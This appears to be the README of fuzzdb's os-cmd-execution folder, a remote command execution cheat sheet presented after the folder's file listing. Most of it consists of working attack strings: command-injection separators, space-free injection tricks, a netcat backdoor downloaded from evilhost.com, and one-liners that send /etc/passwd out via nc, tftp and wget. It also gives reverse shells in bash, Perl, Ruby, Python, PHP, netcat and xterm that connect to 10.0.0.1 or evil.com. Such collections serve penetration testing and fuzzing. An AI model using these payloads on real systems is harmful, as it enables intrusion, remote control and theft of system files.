fuzzdb/attack/os-cmd-execution
2016-10-04 00:22:49 -04:00
..
docs doc relocation and renaming update 2015-09-11 19:39:11 -04:00
command-execution-unix.txt Fix #144 2016-05-25 17:56:24 -06:00
Commands-Linux.txt Fix #144 2016-05-25 17:56:24 -06:00
Commands-OSX.txt Fix #144 2016-05-25 17:56:24 -06:00
Commands-Windows.txt Fix #144 2016-05-25 17:56:24 -06:00
Commands-WindowsPowershell.txt Fix #144 2016-05-25 17:56:24 -06:00
OSCommandInject.Windows.txt Fix #144 2016-05-25 17:56:24 -06:00
README.md Update docs: remote command exec without spaces 2016-10-04 00:22:49 -04:00
source-disc-cmd-exec-traversal.txt Fix #144 2016-05-25 17:56:24 -06:00
useful-commands-unix.txt Fix #144 2016-05-25 17:56:24 -06:00
useful-commands-windows.txt Fix #144 2016-05-25 17:56:24 -06:00

Remote Command Exec Cheatsheet

File notes

source-disc-cmd-exec-traversal.fuzz.txt usage
GET /path/*payload*relative/path/to/target/file/

Executing Commands Seperating Commands
blah;blah2

PIPES
blah ^ blah 2

AND
blah && blah2

OR
FAIL || X

OR
blah%0Dblah2%0Dblah3

Backtick
`blah`

Background
`blah & blah2`

Shell commands without spaces Using Internal Field Separator (IFS) Test for cmd injection withouot spaces:
sleep${IFS:0:1}20

Example netcat backdoor without spaces:
{wget,http://evilhost.com/nc}
{chmod,+x,./nc}
{./nc,-l,-p,6666,-e,/bin/bash}

Shell Variables
CMD=$'cat\x20/etc/passwd';$CMD

shell variable, increment through file one line at a time:
increment the first +1 to retreive the entire file, line by line
SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1

Exfiltrating Files / Data

FTP
Make a new text file, and echo and then redirect to FTP

NC
'nc -e /bin/sh'

NC
'echo /etc/passwd | nc host port'

TFTP
'echo put /etc/passwd | tftp host'

WGET:
'wget --post-file /etc/passwd'

One-Liner Reverse Shells On the listener
$ nc -l -p 8080 -vvv'

On the remote host...
Bash:
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

$ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done

Perl
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby
$ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Python
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP
$ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)

Netcat
$ nc -e /bin/sh 10.0.0.1 1234

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

XTERM:
Server:
$ xterm -display 10.0.0.1:1 Listener:
$ Xnest :1 $ xhost +targetip


More docs: /docs/attack-docs/remote-cmd-exfiltration/